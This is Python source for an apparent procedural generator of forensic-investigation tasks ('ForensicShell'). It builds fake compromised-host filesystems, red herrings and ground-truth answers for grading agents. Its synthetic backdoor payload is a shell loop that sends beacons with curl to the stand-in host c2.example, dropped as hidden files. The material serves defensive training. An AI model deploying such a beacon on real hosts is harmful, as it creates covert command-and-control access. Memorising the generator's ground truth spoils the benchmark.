Spaces:
Sleeping
Sleeping
| """ | |
| Procedural scenario generator for ForensicShell. | |
| Pure function of (seed, difficulty, pattern). Identical inputs always produce | |
| identical scenarios, so seeds work as train/val/test splits and make curricula | |
| reproducible. No global random state is touched. | |
| Public API: | |
| generate_scenario(seed, difficulty=3, pattern=None) -> dict | |
| The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in | |
| scenarios.py — it is a drop-in replacement the env can load through reset(). | |
| Difficulty tiers: | |
| 1 easy user + ip | |
| 2 medium + modified_files + backdoor_sha256 | |
| 3 medium+ same as 2 but more noise | |
| 4 hard + timeline, with red-herring content | |
| 5 hard+ same as 4 with extra red herrings and more complex timeline | |
| """ | |
| from __future__ import annotations | |
| import hashlib | |
| import random | |
| from datetime import datetime, timedelta | |
| from types import SimpleNamespace | |
| from typing import Dict, Optional | |
| from .attack_patterns import PATTERNS | |
| from .name_pools import ( | |
| DECOY_USERS, | |
| HOSTNAMES, | |
| sample_hostname, | |
| sample_internal_ip, | |
| sample_public_ip, | |
| sample_username, | |
| ) | |
| # --------------------------------------------------------------------------- | |
| # Deterministic seed → backdoor bytes | |
| # --------------------------------------------------------------------------- | |
def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]:
    """
    Build the synthetic backdoor payload for a (seed, pattern) pair.

    Returns a ``(payload, sha256_hex, slug)`` triple. Nothing here consults a
    random generator: the payload is derived purely from ``seed`` and
    ``pattern``, so the same pair always yields the same bytes and therefore
    the same SHA256.
    """
    # Six hex chars of an MD5 over "seed-pattern"; used only as a short label.
    slug = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6]

    script_lines = [
        "#!/bin/sh",
        f"# synthetic payload {pattern}",
        f"# seed={seed} slug={slug}",
        "while :; do",
        f' curl -s -X POST http://c2.example/beacon -d "id={slug}"',
        " sleep 60",
        "done",
    ]
    script = "".join(line + "\n" for line in script_lines).encode()

    # A raw 32-byte digest is appended after the shell text, so the blob is
    # not pure text.
    trailer = hashlib.sha256(f"{seed}|{pattern}".encode()).digest()
    blob = script + trailer
    return blob, hashlib.sha256(blob).hexdigest(), slug
def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str:
    """
    Return the absolute path where the given pattern drops its payload.

    ``short`` becomes a hidden (dot-prefixed) file name for every pattern
    except "insider", which always uses a fixed staging path. Unrecognised
    tags fall back to a hidden file under /usr/local/bin. ``user`` is accepted
    but not consulted.
    """
    hidden = f".{short}"
    drop_sites = {
        "webshell": f"/var/www/html/{hidden}.bin",
        "supply_chain": f"/tmp/{hidden}",
        "insider": "/tmp/.staging/dump.sql",
        "ssh_key_theft": f"/usr/local/sbin/{hidden}",
    }
    return drop_sites.get(pattern_tag, f"/usr/local/bin/{hidden}")
| # --------------------------------------------------------------------------- | |
| # Filesystem + ground-truth assembly | |
| # --------------------------------------------------------------------------- | |
def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]:
    """
    Produce ``lines`` benign sshd entries used to pad the auth log.

    Each entry is stamped 1-72 hours (plus 0-59 minutes) before ``ts_base``
    and is one of: an accepted public-key login, a PAM session-open, or a
    client disconnect. Entries are returned in generation order, not sorted
    by timestamp.
    """
    accounts = ["ops", "alice", "bob", "jenkins", "monitoring", "deploy"]
    events = ["Accepted publickey", "session opened", "Received disconnect"]

    entries = []
    for _ in range(lines):
        # The sequence of rng draws below is part of the output contract:
        # reordering them would change what a given seed generates.
        back_hours = rng.randint(1, 72)
        back_minutes = rng.randint(0, 59)
        account = rng.choice(accounts)
        src = f"10.0.0.{rng.randint(2, 200)}"
        event = rng.choice(events)

        when = ts_base - timedelta(hours=back_hours, minutes=back_minutes)
        prefix = f"{when.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: "

        if event == "session opened":
            # Session-open lines carry no source port, so no port is drawn.
            message = f"pam_unix(sshd:session): session opened for user {account} by (uid=0)"
        else:
            port = rng.randint(30000, 65000)
            if event == "Accepted publickey":
                message = f"Accepted publickey for {account} from {src} port {port} ssh2"
            else:
                message = f"Received disconnect from {src} port {port}:11: disconnected by user"
        entries.append(prefix + message)
    return entries
def _passwd_file(main_user: str, rng) -> str:
    """
    Render /etc/passwd content: root first, then the decoy accounts and
    ``main_user`` in an rng-shuffled order with consecutive UIDs from 1000.

    The returned text ends with a trailing newline.
    """
    accounts = [*DECOY_USERS, main_user]
    rng.shuffle(accounts)  # position in the file should not reveal the main user

    entries = ["root:x:0:0:root:/root:/bin/bash"]
    entries.extend(
        f"{name}:x:{uid}:{uid}:{name.title()},,,:/home/{name}:/bin/bash"
        for uid, name in enumerate(accounts, start=1000)
    )
    return "\n".join(entries) + "\n"
def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict:
    """
    Build decoy filesystem entries for the harder difficulty tiers.

    Returns a mapping of path -> content. These are distractions only; none
    of the paths are meant to appear in ground_truth.modified_files.

    intensity 1 yields a rotated auth log and a decoy user's shell history;
    intensity >= 2 additionally yields a binary blob at /tmp/.cache and a
    benign cron entry.
    """
    stamp_fmt = "%b %d %H:%M:%S"

    # Rotated auth log: one failed login probe from an unrelated public IP,
    # followed three minutes later by its disconnect.
    probe_ip = sample_public_ip(rng)
    probe_at = ts_base - timedelta(days=1)
    hangup_at = probe_at + timedelta(minutes=3)
    probe_port = rng.randint(30000, 65000)
    rotated_log = (
        f"{probe_at.strftime(stamp_fmt)} {host} "
        f"sshd[101]: Failed password for invalid user admin from {probe_ip} "
        f"port {probe_port} ssh2\n"
        f"{hangup_at.strftime(stamp_fmt)} {host} "
        f"sshd[104]: Received disconnect from {probe_ip}: [preauth]\n"
    )

    # Shell history for a decoy account: looks suspicious, does nothing harmful.
    bystander = rng.choice(DECOY_USERS)
    history_lines = [
        "ls -la",
        "sudo systemctl status cron",
        "curl https://api.github.com/users/torvalds",
        "python3 -m http.server 8000 &",
        "pkill -f http.server",
    ]

    decoys = {
        "/var/log/auth.log.1": rotated_log,
        f"/home/{bystander}/.bash_history": "".join(cmd + "\n" for cmd in history_lines),
    }

    if intensity >= 2:
        # 128 bytes of digest material; an agent that hashes it and submits
        # that hash as the backdoor will be wrong.
        decoys["/tmp/.cache"] = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4
        # A cron entry that resembles persistence but is a routine backup job.
        decoys["/etc/cron.d/backup-nightly"] = (
            "# Nightly backup β owned by ops team\n"
            "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n"
        )
    return decoys
| # --------------------------------------------------------------------------- | |
| # Main public function | |
| # --------------------------------------------------------------------------- | |
def generate_scenario(
    seed: int,
    difficulty: int = 3,
    pattern: Optional[str] = None,
) -> Dict:
    """
    Deterministic scenario generator.

    Args:
        seed: any integer; identical inputs yield identical scenarios.
        difficulty: 1..5. Coerced with int() and clamped into that range.
        pattern: one of attack_patterns.PATTERNS keys; if None, picked from
            the seeded generator.

    Returns:
        dict with keys: task_id, difficulty, description, filesystem,
        ground_truth. ground_truth always holds compromised_user and
        initial_ip; modified_files and backdoor_sha256 are added at
        difficulty >= 2, and timeline at difficulty >= 4.

    Raises:
        ValueError: if ``pattern`` is not a key of PATTERNS.
        AssertionError: if the pattern template lists a modified path that is
            absent from the assembled filesystem.
    """
    # Normalise to an integer tier first, so the tier comparisons, the label
    # and the task_id below all agree (a float such as 4.5 used to enable the
    # hard-tier content while being labelled "medium").
    difficulty = max(1, min(5, int(difficulty)))
    seed = int(seed)

    # A private generator: no global random state is touched. Every draw below
    # happens in a fixed order, which is what makes the output reproducible.
    rng = random.Random(seed)

    # 1. pick pattern
    if pattern is None:
        pattern = rng.choice(list(PATTERNS.keys()))
    if pattern not in PATTERNS:
        raise ValueError(f"unknown pattern: {pattern}")

    # 2. sample entities
    host = sample_hostname(rng)
    main_user = sample_username(rng)
    if pattern == "insider":
        attacker_ip = sample_internal_ip(rng)
    else:
        attacker_ip = sample_public_ip(rng)

    # 3. base timestamp: always in 2025, deterministic.
    # randint() includes both endpoints and 2025 has 365 days, so the largest
    # offset that stays inside the year is 364 (365 would be 2026-01-01).
    day_offset = rng.randint(0, 364)
    hour = rng.randint(8, 22)
    minute = rng.randint(0, 59)
    ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute)

    # 4. synthesize backdoor payload (depends on seed and pattern only, not rng)
    bd_bytes, bd_sha, short = _synth_backdoor(seed, pattern)
    bd_path = _backdoor_path_for(pattern, short, main_user)
    ctx = SimpleNamespace(
        rng=rng,
        user=main_user,
        ip=attacker_ip,
        host=host,
        ts_base=ts_base,
        backdoor_bytes=bd_bytes,
        backdoor_sha256=bd_sha,
        backdoor_path=bd_path,
        short=short,
    )

    # 5. run the pattern template; it receives the shared rng through ctx
    result = PATTERNS[pattern](ctx)

    # 6. build filesystem: benign noise lines first, then the pattern's lines
    noise = _legit_noise_auth_log(rng, host, ts_base, lines=6)
    auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n"
    filesystem: Dict[str, object] = {
        "/var/log/auth.log": auth_log,
        f"/home/{main_user}/.bash_history": result["bash_history"],
        "/etc/passwd": _passwd_file(main_user, rng),
        "/etc/hostname": f"{host}\n",
        f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n",
    }
    # Pattern-specific files may overwrite the defaults above.
    filesystem.update(result["modified_files"])

    # 7. red herrings (hard tiers only)
    if difficulty >= 4:
        intensity = 1 if difficulty == 4 else 2
        for path, content in _red_herrings(rng, host, ts_base, intensity).items():
            # setdefault: a decoy never overwrites a real artifact.
            filesystem.setdefault(path, content)

    # 8. every ground-truth path must exist in the filesystem. Raised
    # explicitly rather than via `assert` so the check survives `python -O`.
    for p in result["modified_paths"]:
        if p not in filesystem:
            raise AssertionError(f"ground-truth path not in filesystem: {p}")

    # 9. assemble ground truth by difficulty tier
    gt: Dict = {
        "compromised_user": main_user,
        "initial_ip": attacker_ip,
    }
    if difficulty >= 2:
        gt["modified_files"] = list(result["modified_paths"])
        gt["backdoor_sha256"] = bd_sha
    if difficulty >= 4:
        gt["timeline"] = list(result["timeline"])

    return {
        "task_id": f"gen_{seed}_d{difficulty}_{pattern}",
        "difficulty": _difficulty_label(difficulty),
        "description": _describe(difficulty, pattern, main_user, host),
        "filesystem": filesystem,
        "ground_truth": gt,
    }
| # --------------------------------------------------------------------------- | |
| # Small helpers | |
| # --------------------------------------------------------------------------- | |
def _difficulty_label(d: int) -> str:
    """Map a numeric tier to its label: 1 is easy, 4-5 are hard, anything else is medium."""
    if d == 1:
        return "easy"
    if d in (4, 5):
        return "hard"
    return "medium"
def _describe(difficulty: int, pattern: str, user: str, host: str) -> str:
    """
    Compose the task prompt shown to the agent.

    The opening is the same for every tier; only the list of fields to report
    changes: tier 1 asks for user and IP, tiers 2-3 add modified files and the
    backdoor hash, and every other tier also asks for the kill-chain timeline.
    ``user`` is accepted but never included in the text.
    """
    if difficulty == 1:
        wanted = "compromised_user and initial_ip only."
    elif difficulty in (2, 3):
        wanted = (
            "compromised_user, initial_ip, modified_files "
            "(absolute paths), and the SHA256 of the attacker-dropped backdoor."
        )
    else:
        wanted = (
            "compromised_user, initial_ip, modified_files, "
            "backdoor_sha256, AND an ordered kill-chain timeline with phases "
            "login -> recon -> privesc -> persistence -> exfil. Red herrings may be "
            "present."
        )

    intro = (
        f"Host '{host}' was compromised. Investigate the filesystem to determine "
        "what happened. Start by reading /var/log/auth.log and the shell histories "
        "under /home."
    )
    return f"{intro} Report: {wanted} (Pattern: {pattern})"